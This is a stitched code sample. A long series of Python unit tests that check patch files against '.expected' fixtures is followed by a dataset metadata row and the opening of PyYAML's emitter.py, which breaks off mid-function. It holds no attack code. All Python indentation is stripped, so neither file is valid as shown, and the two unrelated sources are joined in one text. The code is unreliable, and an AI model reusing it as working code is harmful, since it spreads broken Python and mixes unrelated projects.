def test_patch_info_patch_patches_misc_linux_st710x_patches_setup_stb7100_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/setup-stb7100.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/setup-stb7100.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_setup_stx7105_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/setup-stx7105.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/setup-stx7105.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_setup_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/setup.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/setup.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_sh_kernel_setup_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/sh_kernel_setup.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/sh_kernel_setup.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_sh_ksyms_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/sh_ksyms.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/sh_ksyms.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_smsc_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/smsc.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/smsc.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_smsc_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/smsc_makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/smsc_makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_soc_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/soc.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/soc.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_3_revert_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.3_revert.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.3_revert.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_3_revert1_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.3_revert1.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.3_revert1.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_3_revert2_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.3_revert2.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.3_revert2.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_3_revert3_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.3_revert3.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.3_revert3.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_squashfs3_4_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/squashfs3.4.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/squashfs3.4.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_stasc_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/stasc.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/stasc.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_stmmac_main_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/stmmac_main.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/stmmac_main.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_suppress_igmp_report_listening_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/suppress_igmp_report_listening.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/suppress_igmp_report_listening.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_time_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/time.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/time.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_unionfs_2_5_1_for_2_6_23_17_diff(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/unionfs-2.5.1_for_2.6.23.17.diff')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/unionfs-2.5.1_for_2.6.23.17.diff.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_unionfs_remove_debug_printouts_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/unionfs_remove_debug_printouts.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/unionfs_remove_debug_printouts.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19x0_vidmem_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19x0_vidmem.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19x0_vidmem.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19x3_board_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19x3_board.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19x3_board.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19xx_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19xx.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19xx.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19xx_nand_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19xx_nand.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19xx_nand.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vip19xx_nor_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vip19xx_nor.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vip19xx_nor.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_vt_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/vt.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/vt.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_yaffs2_2008_07_15_for_2_6_23_17_yaffs_guts_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/yaffs2-2008.07.15_for_2.6.23.17-yaffs_guts.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/yaffs2-2008.07.15_for_2.6.23.17-yaffs_guts.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_linux_st710x_patches_yaffs2_2008_07_15_for_2_6_23_17_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/linux-st710x/patches/yaffs2-2008.07.15_for_2.6.23.17.patch')
expected_file = self.get_test_loc('patch/patches/misc/linux-st710x/patches/yaffs2-2008.07.15_for_2.6.23.17.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_npapi_patches_npapi_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/npapi/patches/npapi.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/npapi/patches/npapi.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_openssl_0_9_8_patches_configure_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/openssl-0.9.8/patches/Configure.patch')
expected_file = self.get_test_loc('patch/patches/misc/openssl-0.9.8/patches/Configure.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_sqlite_patches_permissions_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/sqlite/patches/permissions.patch')
expected_file = self.get_test_loc('patch/patches/misc/sqlite/patches/permissions.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_arpping_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/arpping.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/arpping.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_clientpacket_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/clientpacket.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/clientpacket.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_clientpacket_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/clientpacket.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/clientpacket.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_debug_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/debug.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/debug.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_dhcpc_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/dhcpc.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/dhcpc.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_dhcpc_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/dhcpc.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/dhcpc.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_dhcpd_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/dhcpd.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/dhcpd.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_makefile_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/Makefile.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/Makefile.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_options_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/options.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/options.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_options_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/options.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/options.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_packet_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/packet.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/packet.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_packet_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/packet.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/packet.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_route_patch1(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/route.patch1')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/route.patch1.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_script_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/script.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/script.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_udhcp_0_9_8_patch_t1t2_patch1(self):
test_file = self.get_test_loc(u'patch/patches/misc/udhcp-0.9.8/patch/t1t2.patch1')
expected_file = self.get_test_loc('patch/patches/misc/udhcp-0.9.8/patch/t1t2.patch1.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_build_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/BUILD.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/BUILD.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_cross_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/cross.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/cross.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_uclibc_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/uclibc.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/uclibc.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_vqec_ifclient_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/vqec_ifclient.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/vqec_ifclient.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_vqec_wv_c_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/vqec_wv.c.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/vqec_wv.c.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_misc_vqec_patch_vqec_wv_h_patch(self):
test_file = self.get_test_loc(u'patch/patches/misc/vqec/patch/vqec_wv.h.patch')
expected_file = self.get_test_loc('patch/patches/misc/vqec/patch/vqec_wv.h.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_postgrey_1_30_group_patch(self):
test_file = self.get_test_loc(u'patch/patches/postgrey-1.30-group.patch')
expected_file = self.get_test_loc('patch/patches/postgrey-1.30-group.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_drupal_upload_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/drupal_upload.patch')
expected_file = self.get_test_loc('patch/patches/windows/drupal_upload.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_ether_patch_1_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/ether_patch_1.patch')
expected_file = self.get_test_loc('patch/patches/windows/ether_patch_1.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_js_delete_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/js_delete.patch')
expected_file = self.get_test_loc('patch/patches/windows/js_delete.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_plugin_explorer_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/plugin explorer.patch')
expected_file = self.get_test_loc('patch/patches/windows/plugin explorer.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_resolveentity32_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/resolveentity32.patch')
expected_file = self.get_test_loc('patch/patches/windows/resolveentity32.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_sift_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/sift.patch')
expected_file = self.get_test_loc('patch/patches/windows/sift.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_thumbnail_support_0_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/thumbnail_support_0.patch')
expected_file = self.get_test_loc('patch/patches/windows/thumbnail_support_0.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_thumbnail_support_0_patch_1(self):
test_file = self.get_test_loc(u'patch/patches/windows/thumbnail_support_0.patch.1')
expected_file = self.get_test_loc('patch/patches/windows/thumbnail_support_0.patch.1.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_webform_3_0_conditional_constructor_0_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/webform-3.0-conditional_constructor_0.patch')
expected_file = self.get_test_loc('patch/patches/windows/webform-3.0-conditional_constructor_0.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_windows_xml_rpc_addspace_patch(self):
test_file = self.get_test_loc(u'patch/patches/windows/xml_rpc_addSpace.patch')
expected_file = self.get_test_loc('patch/patches/windows/xml_rpc_addSpace.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_xvidcap_1_1_6_docdir_patch(self):
test_file = self.get_test_loc(u'patch/patches/xvidcap-1.1.6-docdir.patch')
expected_file = self.get_test_loc('patch/patches/xvidcap-1.1.6-docdir.patch.expected')
check_patch(test_file, expected_file)
def test_patch_info_patch_patches_xvidcap_xorg_patch(self):
test_file = self.get_test_loc(u'patch/patches/xvidcap-xorg.patch')
expected_file = self.get_test_loc('patch/patches/xvidcap-xorg.patch.expected')
check_patch(test_file, expected_file)
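    # Every test above follows the same fixture pattern: load a patch file and
    # its .expected JSON companion, then delegate to check_patch. A sketch of
    # the implied harness (get_patch_info is a hypothetical entry point; only
    # check_patch is referenced in this file):
    #   def check_patch(test_file, expected_file):
    #       result = get_patch_info(test_file)
    #       expected = json.load(open(expected_file))
    #       assert result == expected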
| apache-2.0 |
hairmare/php-buildpack | lib/yaml/emitter.py | 387 | 43298 |
# Emitter expects events obeying the following grammar:
# stream ::= STREAM-START document* STREAM-END
# document ::= DOCUMENT-START node DOCUMENT-END
# node ::= SCALAR | sequence | mapping
# sequence ::= SEQUENCE-START node* SEQUENCE-END
# mapping ::= MAPPING-START (node node)* MAPPING-END
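# For example, serializing the single document {a: 1} corresponds to the
# event sequence (a sketch, using the event classes from events.py):
#   StreamStartEvent, DocumentStartEvent, MappingStartEvent,
#   ScalarEvent(value=u'a'), ScalarEvent(value=u'1'),
#   MappingEndEvent, DocumentEndEvent, StreamEndEvent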
__all__ = ['Emitter', 'EmitterError']
from error import YAMLError
from events import *
class EmitterError(YAMLError):
pass
class ScalarAnalysis(object):
def __init__(self, scalar, empty, multiline,
allow_flow_plain, allow_block_plain,
allow_single_quoted, allow_double_quoted,
allow_block):
self.scalar = scalar
self.empty = empty
self.multiline = multiline
self.allow_flow_plain = allow_flow_plain
self.allow_block_plain = allow_block_plain
self.allow_single_quoted = allow_single_quoted
self.allow_double_quoted = allow_double_quoted
self.allow_block = allow_block
class Emitter(object):
DEFAULT_TAG_PREFIXES = {
u'!' : u'!',
u'tag:yaml.org,2002:' : u'!!',
}
def __init__(self, stream, canonical=None, indent=None, width=None,
allow_unicode=None, line_break=None):
# The stream should have the methods `write` and possibly `flush`.
self.stream = stream
        # Encoding can be overridden by STREAM-START.
self.encoding = None
# Emitter is a state machine with a stack of states to handle nested
# structures.
self.states = []
self.state = self.expect_stream_start
# Current event and the event queue.
self.events = []
self.event = None
# The current indentation level and the stack of previous indents.
self.indents = []
self.indent = None
# Flow level.
self.flow_level = 0
# Contexts.
self.root_context = False
self.sequence_context = False
self.mapping_context = False
self.simple_key_context = False
# Characteristics of the last emitted character:
# - current position.
# - is it a whitespace?
# - is it an indention character
# (indentation space, '-', '?', or ':')?
self.line = 0
self.column = 0
self.whitespace = True
self.indention = True
# Whether the document requires an explicit document indicator
self.open_ended = False
# Formatting details.
self.canonical = canonical
self.allow_unicode = allow_unicode
self.best_indent = 2
if indent and 1 < indent < 10:
self.best_indent = indent
self.best_width = 80
if width and width > self.best_indent*2:
self.best_width = width
self.best_line_break = u'\n'
if line_break in [u'\r', u'\n', u'\r\n']:
self.best_line_break = line_break
# Tag prefixes.
self.tag_prefixes = None
# Prepared anchor and tag.
self.prepared_anchor = None
self.prepared_tag = None
# Scalar analysis and style.
self.analysis = None
self.style = None
def dispose(self):
# Reset the state attributes (to clear self-references)
self.states = []
self.state = None
def emit(self, event):
self.events.append(event)
while not self.need_more_events():
self.event = self.events.pop(0)
self.state()
self.event = None
# In some cases, we wait for a few next events before emitting.
def need_more_events(self):
if not self.events:
return True
event = self.events[0]
if isinstance(event, DocumentStartEvent):
return self.need_events(1)
elif isinstance(event, SequenceStartEvent):
return self.need_events(2)
elif isinstance(event, MappingStartEvent):
return self.need_events(3)
else:
return False
def need_events(self, count):
level = 0
for event in self.events[1:]:
if isinstance(event, (DocumentStartEvent, CollectionStartEvent)):
level += 1
elif isinstance(event, (DocumentEndEvent, CollectionEndEvent)):
level -= 1
elif isinstance(event, StreamEndEvent):
level = -1
if level < 0:
return False
return (len(self.events) < count+1)
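    # Example of the lookahead above: a MappingStartEvent is held back until
    # enough following events are queued (up to the first key/value pair) so
    # that check_empty_mapping() and check_simple_key() can peek ahead before
    # any output is committed.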
def increase_indent(self, flow=False, indentless=False):
self.indents.append(self.indent)
if self.indent is None:
if flow:
self.indent = self.best_indent
else:
self.indent = 0
elif not indentless:
self.indent += self.best_indent
# States.
# Stream handlers.
def expect_stream_start(self):
if isinstance(self.event, StreamStartEvent):
if self.event.encoding and not getattr(self.stream, 'encoding', None):
self.encoding = self.event.encoding
self.write_stream_start()
self.state = self.expect_first_document_start
else:
raise EmitterError("expected StreamStartEvent, but got %s"
% self.event)
def expect_nothing(self):
raise EmitterError("expected nothing, but got %s" % self.event)
# Document handlers.
def expect_first_document_start(self):
return self.expect_document_start(first=True)
def expect_document_start(self, first=False):
if isinstance(self.event, DocumentStartEvent):
if (self.event.version or self.event.tags) and self.open_ended:
self.write_indicator(u'...', True)
self.write_indent()
if self.event.version:
version_text = self.prepare_version(self.event.version)
self.write_version_directive(version_text)
self.tag_prefixes = self.DEFAULT_TAG_PREFIXES.copy()
if self.event.tags:
handles = self.event.tags.keys()
handles.sort()
for handle in handles:
prefix = self.event.tags[handle]
self.tag_prefixes[prefix] = handle
handle_text = self.prepare_tag_handle(handle)
prefix_text = self.prepare_tag_prefix(prefix)
self.write_tag_directive(handle_text, prefix_text)
implicit = (first and not self.event.explicit and not self.canonical
and not self.event.version and not self.event.tags
and not self.check_empty_document())
if not implicit:
self.write_indent()
self.write_indicator(u'---', True)
if self.canonical:
self.write_indent()
self.state = self.expect_document_root
elif isinstance(self.event, StreamEndEvent):
if self.open_ended:
self.write_indicator(u'...', True)
self.write_indent()
self.write_stream_end()
self.state = self.expect_nothing
else:
raise EmitterError("expected DocumentStartEvent, but got %s"
% self.event)
def expect_document_end(self):
if isinstance(self.event, DocumentEndEvent):
self.write_indent()
if self.event.explicit:
self.write_indicator(u'...', True)
self.write_indent()
self.flush_stream()
self.state = self.expect_document_start
else:
raise EmitterError("expected DocumentEndEvent, but got %s"
% self.event)
def expect_document_root(self):
self.states.append(self.expect_document_end)
self.expect_node(root=True)
# Node handlers.
def expect_node(self, root=False, sequence=False, mapping=False,
simple_key=False):
self.root_context = root
self.sequence_context = sequence
self.mapping_context = mapping
self.simple_key_context = simple_key
if isinstance(self.event, AliasEvent):
self.expect_alias()
elif isinstance(self.event, (ScalarEvent, CollectionStartEvent)):
self.process_anchor(u'&')
self.process_tag()
if isinstance(self.event, ScalarEvent):
self.expect_scalar()
elif isinstance(self.event, SequenceStartEvent):
if self.flow_level or self.canonical or self.event.flow_style \
or self.check_empty_sequence():
self.expect_flow_sequence()
else:
self.expect_block_sequence()
elif isinstance(self.event, MappingStartEvent):
if self.flow_level or self.canonical or self.event.flow_style \
or self.check_empty_mapping():
self.expect_flow_mapping()
else:
self.expect_block_mapping()
else:
raise EmitterError("expected NodeEvent, but got %s" % self.event)
def expect_alias(self):
if self.event.anchor is None:
raise EmitterError("anchor is not specified for alias")
self.process_anchor(u'*')
self.state = self.states.pop()
def expect_scalar(self):
self.increase_indent(flow=True)
self.process_scalar()
self.indent = self.indents.pop()
self.state = self.states.pop()
# Flow sequence handlers.
def expect_flow_sequence(self):
self.write_indicator(u'[', True, whitespace=True)
self.flow_level += 1
self.increase_indent(flow=True)
self.state = self.expect_first_flow_sequence_item
def expect_first_flow_sequence_item(self):
if isinstance(self.event, SequenceEndEvent):
self.indent = self.indents.pop()
self.flow_level -= 1
self.write_indicator(u']', False)
self.state = self.states.pop()
else:
if self.canonical or self.column > self.best_width:
self.write_indent()
self.states.append(self.expect_flow_sequence_item)
self.expect_node(sequence=True)
def expect_flow_sequence_item(self):
if isinstance(self.event, SequenceEndEvent):
self.indent = self.indents.pop()
self.flow_level -= 1
if self.canonical:
self.write_indicator(u',', False)
self.write_indent()
self.write_indicator(u']', False)
self.state = self.states.pop()
else:
self.write_indicator(u',', False)
if self.canonical or self.column > self.best_width:
self.write_indent()
self.states.append(self.expect_flow_sequence_item)
self.expect_node(sequence=True)
# Flow mapping handlers.
def expect_flow_mapping(self):
self.write_indicator(u'{', True, whitespace=True)
self.flow_level += 1
self.increase_indent(flow=True)
self.state = self.expect_first_flow_mapping_key
def expect_first_flow_mapping_key(self):
if isinstance(self.event, MappingEndEvent):
self.indent = self.indents.pop()
self.flow_level -= 1
self.write_indicator(u'}', False)
self.state = self.states.pop()
else:
if self.canonical or self.column > self.best_width:
self.write_indent()
if not self.canonical and self.check_simple_key():
self.states.append(self.expect_flow_mapping_simple_value)
self.expect_node(mapping=True, simple_key=True)
else:
self.write_indicator(u'?', True)
self.states.append(self.expect_flow_mapping_value)
self.expect_node(mapping=True)
def expect_flow_mapping_key(self):
if isinstance(self.event, MappingEndEvent):
self.indent = self.indents.pop()
self.flow_level -= 1
if self.canonical:
self.write_indicator(u',', False)
self.write_indent()
self.write_indicator(u'}', False)
self.state = self.states.pop()
else:
self.write_indicator(u',', False)
if self.canonical or self.column > self.best_width:
self.write_indent()
if not self.canonical and self.check_simple_key():
self.states.append(self.expect_flow_mapping_simple_value)
self.expect_node(mapping=True, simple_key=True)
else:
self.write_indicator(u'?', True)
self.states.append(self.expect_flow_mapping_value)
self.expect_node(mapping=True)
def expect_flow_mapping_simple_value(self):
self.write_indicator(u':', False)
self.states.append(self.expect_flow_mapping_key)
self.expect_node(mapping=True)
def expect_flow_mapping_value(self):
if self.canonical or self.column > self.best_width:
self.write_indent()
self.write_indicator(u':', True)
self.states.append(self.expect_flow_mapping_key)
self.expect_node(mapping=True)
# Block sequence handlers.
def expect_block_sequence(self):
indentless = (self.mapping_context and not self.indention)
self.increase_indent(flow=False, indentless=indentless)
self.state = self.expect_first_block_sequence_item
def expect_first_block_sequence_item(self):
return self.expect_block_sequence_item(first=True)
def expect_block_sequence_item(self, first=False):
if not first and isinstance(self.event, SequenceEndEvent):
self.indent = self.indents.pop()
self.state = self.states.pop()
else:
self.write_indent()
self.write_indicator(u'-', True, indention=True)
self.states.append(self.expect_block_sequence_item)
self.expect_node(sequence=True)
# Block mapping handlers.
def expect_block_mapping(self):
self.increase_indent(flow=False)
self.state = self.expect_first_block_mapping_key
def expect_first_block_mapping_key(self):
return self.expect_block_mapping_key(first=True)
def expect_block_mapping_key(self, first=False):
if not first and isinstance(self.event, MappingEndEvent):
self.indent = self.indents.pop()
self.state = self.states.pop()
else:
self.write_indent()
if self.check_simple_key():
self.states.append(self.expect_block_mapping_simple_value)
self.expect_node(mapping=True, simple_key=True)
else:
self.write_indicator(u'?', True, indention=True)
self.states.append(self.expect_block_mapping_value)
self.expect_node(mapping=True)
def expect_block_mapping_simple_value(self):
self.write_indicator(u':', False)
self.states.append(self.expect_block_mapping_key)
self.expect_node(mapping=True)
def expect_block_mapping_value(self):
self.write_indent()
self.write_indicator(u':', True, indention=True)
self.states.append(self.expect_block_mapping_key)
self.expect_node(mapping=True)
# Checkers.
def check_empty_sequence(self):
return (isinstance(self.event, SequenceStartEvent) and self.events
and isinstance(self.events[0], SequenceEndEvent))
def check_empty_mapping(self):
return (isinstance(self.event, MappingStartEvent) and self.events
and isinstance(self.events[0], MappingEndEvent))
def check_empty_document(self):
if not isinstance(self.event, DocumentStartEvent) or not self.events:
return False
event = self.events[0]
return (isinstance(event, ScalarEvent) and event.anchor is None
and event.tag is None and event.implicit and event.value == u'')
def check_simple_key(self):
length = 0
